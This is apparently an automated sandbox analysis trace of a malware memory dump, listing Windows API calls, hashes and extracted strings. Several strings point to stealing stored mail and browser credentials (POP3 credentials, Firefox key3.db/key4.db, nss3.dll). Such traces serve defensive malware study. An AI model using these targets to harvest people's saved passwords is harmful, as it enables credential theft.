                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                                                                                                                    • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                                                                                                                      • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                                                                                                                      • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                                                                                                                      • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                                                                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Item$DialogMessageSend
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2485852401-0
                                                                                                                                                                                    • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                                                                                    • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                                                                                                                                                    • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                                                                                    • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                                                                                    • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                                                                                    • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                                                                                    • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3642520215-0
                                                                                                                                                                                    • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                    • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2313361498-0
                                                                                                                                                                                    • Opcode ID: d40986e2c2ca4a35e85ac25686d3f593c4cb88516650d0cf74e2f7431fc52bd9
                                                                                                                                                                                    • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                                                                                                                                                                    • Opcode Fuzzy Hash: d40986e2c2ca4a35e85ac25686d3f593c4cb88516650d0cf74e2f7431fc52bd9
                                                                                                                                                                                    • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040BB33
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                                                                                                                                                    • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                                                                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2126104762-0
                                                                                                                                                                                    • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                                                                                    • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008,?,?,?,?,?,?,004012E4,?), ref: 0040730D
                                                                                                                                                                                    • GetDeviceCaps.GDI32(004012E4,0000000A,?,?,?,?,?,?,004012E4,?), ref: 00407316
                                                                                                                                                                                    • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                                                                                    • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                                                                                    • MoveWindow.USER32(004012E4,?,?,?,?,00000001), ref: 00407371
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1999381814-0
                                                                                                                                                                                    • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                    • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                    • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                    • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                                                    • API String ID: 1297977491-3883738016
                                                                                                                                                                                    • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                    • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                    • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                                                                                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                                                                                      • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                      • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                                                                                                      • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                                                                                                      • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                    • String ID: gj
                                                                                                                                                                                    • API String ID: 438689982-4203073231
                                                                                                                                                                                    • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                    • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                                                                                                    • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                    • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __aulldvrm$__aullrem
                                                                                                                                                                                    • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                                                                                                    • API String ID: 643879872-978417875
                                                                                                                                                                                    • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                                                                                    • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                                                                                                                    • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                                                                                    • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                    • memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                    • memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                      • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                                                    • String ID: user_pref("
                                                                                                                                                                                    • API String ID: 765841271-2487180061
                                                                                                                                                                                    • Opcode ID: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                                                                                                                    • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                                                                                                                                                    • Opcode Fuzzy Hash: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                                                                                                    • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                                                                                                    • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                                                                                                    • memset.MSVCRT ref: 004058C3
                                                                                                                                                                                    • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                                                                                                    • SetFocus.USER32(?), ref: 00405976
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4281309102-0
                                                                                                                                                                                    • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                                    • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                      • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040A921
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                    • API String ID: 1631269929-4153097237
                                                                                                                                                                                    • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                                                                                                                    • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                                                                                                                    • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
APIs
• memset.MSVCRT ref: 0040810E
  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
  • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
  • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
• LocalFree.KERNEL32(?,?,?,?,?,00000000,770145ED,?), ref: 004081B9
  • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
• String ID: POP3_credentials$POP3_host$POP3_name
• API String ID: 524865279-2190619648
APIs
• memset.MSVCRT ref: 00406B8E
• strlen.MSVCRT ref: 00406B99
• strlen.MSVCRT ref: 00406BFF
• strlen.MSVCRT ref: 00406C0D
• strlen.MSVCRT ref: 00406BA7
  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: strlen$_mbscat_mbscpymemset
• String ID: key3.db$key4.db
• API String ID: 581844971-3557030128
APIs
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: ItemMenu$CountInfomemsetstrchr
• String ID: 0$6
• API String ID: 2300387033-3849865405
APIs
• memset.MSVCRT ref: 004076D7
• sprintf.MSVCRT ref: 00407704
• strlen.MSVCRT ref: 00407710
• memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
• strlen.MSVCRT ref: 00407733
• memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: memcpystrlen$memsetsprintf
• String ID: %s (%s)
• API String ID: 3756086014-1363028141
APIs
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: _mbscat$memsetsprintf
• String ID: %2.2X
• API String ID: 125969286-791839006
APIs
• memset.MSVCRT ref: 004091EC
• sprintf.MSVCRT ref: 00409201
  • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
  • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
  • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
• SetWindowTextA.USER32(?,?), ref: 00409228
• EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
• String ID: caption$dialog_%d
• API String ID: 2923679083-4161923789
APIs
• memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
Strings
• abort due to ROLLBACK, xrefs: 00428781
• no such savepoint: %s, xrefs: 00426A02
• unknown error, xrefs: 004277B2
• cannot open savepoint - SQL statements in progress, xrefs: 00426934
• cannot release savepoint - SQL statements in progress, xrefs: 00426A20
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: memcpy
• String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
• API String ID: 3510742995-3035234601
APIs
Strings
Memory Dump Source
• Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
Similarity
• API ID: memset
• String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
• API String ID: 2221118986-3608744896
                                                                                                                                                                                    • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                                                                                    • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                                                                                                                                    • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                                                                                    • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                                                                                                                                      • Part of subcall function 0044257F: memcmp.MSVCRT ref: 004425C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcmpmemcpy
                                                                                                                                                                                    • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                                                                                    • API String ID: 1784268899-4153596280
                                                                                                                                                                                    • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                                                                                    • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                                                                                                                                                    • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                                                                                                                    • memset.MSVCRT ref: 00410246
                                                                                                                                                                                    • memset.MSVCRT ref: 00410258
                                                                                                                                                                                      • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                    • memset.MSVCRT ref: 0041033F
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 004103AE
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3974772901-0
                                                                                                                                                                                    • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                                                                                                    • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                                                                                                    • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                                                                                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                                                                                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                                                                                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                                                                                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                                                                                                                                                                    • strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                      • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                                                                                      • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
